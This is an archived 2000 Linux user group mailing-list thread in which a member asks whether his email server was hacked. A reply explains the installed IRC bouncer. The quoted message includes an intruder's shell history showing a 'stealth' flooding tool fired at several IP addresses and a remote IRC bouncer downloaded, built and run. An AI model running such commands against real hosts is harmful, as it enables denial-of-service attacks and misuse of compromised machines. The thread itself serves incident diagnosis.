|
[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]
|
Re: [PLUG] my wacko email server
|
Well you have definitely been hacked. I been reading a lot of
articles recently about hackers using other machines to chat on IRC.
I downloaded the file linked below and read the readme file and here
is an excerpt:
1. INTRODUCTION
IRC in general over the years has progressed into a very complex
host
for multitudes of different types of people. BNC which is a acro
for
BouNCe is a daemon designed to allow some people who do not have
access to the net in general, but who do have access to another pc
that can reach the net, the ability to BouNCe though this pc to
IRC.
BNC also satisfies as a host to allow users to Bounce through
shells
to IRC thus allowing for many features such as an interresting
internet address commonly used for show or for benifits such as
mild
protection from commonly used attacks such as DoS by covering a
users
real IP with that IP of a machine more capable of handling these
attacks.
If you want to give me a call we can see what we can do. My contact
info is on the PLUG homepage under PSP.
Jon
>>>>>>>>>>>>>>>>>> Original Message <<<<<<<<<<<<<<<<<<
On 6/28/00, 8:48:43 AM, wrote regarding :
> My email server went crazy last night, according to my isp, sending
> something lik 3000 packets every 2 seconds to ip address
> 216.87.212.162. Doing a grep on that address I got this response
> /home/squ/.bash_history:./stealth 216.87.212.162 7
> Here is the content of that file... looks loke bnc (an IRC program I
> think) was installed - what is stealth?
> Looks like i was hacked? Any help with interpreting what went on
would be
> appreciated.
> w
> w
> w
> ftp
> l
> w
> ls
> ftp
> gcc -o stealth stealth.c
> ./stealth 207.202.129.211 1234
> ./stealth 206.161.205.30 225
> ls
> ./stealth 207.179.81.70 6668
> ls
> ./stealth 204.156.12.50 6667
> ./stealth 192.114.47.10 6667
> ls
> ./stealth 213.9.19.30 6668
> ./stealth 204.126.2.47 1
> ./stealth 216.123.178.4 1
> ls
> w
> lynx http://ftp.loxinfo.co.th/pub/unix/irc/bnc2.6.2.tar.gz
> ls
> gunzip bnc2.6.2.tar.gz
> tar -vxf bnc2.6.2.tar
> cd bnc2.6.2
> make
> pico example.conf
> ./bnc example.conf
> ls
> ./stealth 216.87.212.162 7
> -Mike
> Michael P. Whitman
> Programmer
> LAW.com
> mailto:michaelw@palawnet.com
> ______________________________________________________________________
> Philadelphia Linux Users Group - http://plug.nothinbut.net
> Announcements - http://lists.nothinbut.net/mail/listinfo/plug-announce
> General Discussion - http://lists.nothinbut.net/mail/listinfo/plug
______________________________________________________________________
Philadelphia Linux Users Group - http://plug.nothinbut.net
Announcements - http://lists.nothinbut.net/mail/listinfo/plug-announce
General Discussion - http://lists.nothinbut.net/mail/listinfo/plug
|
|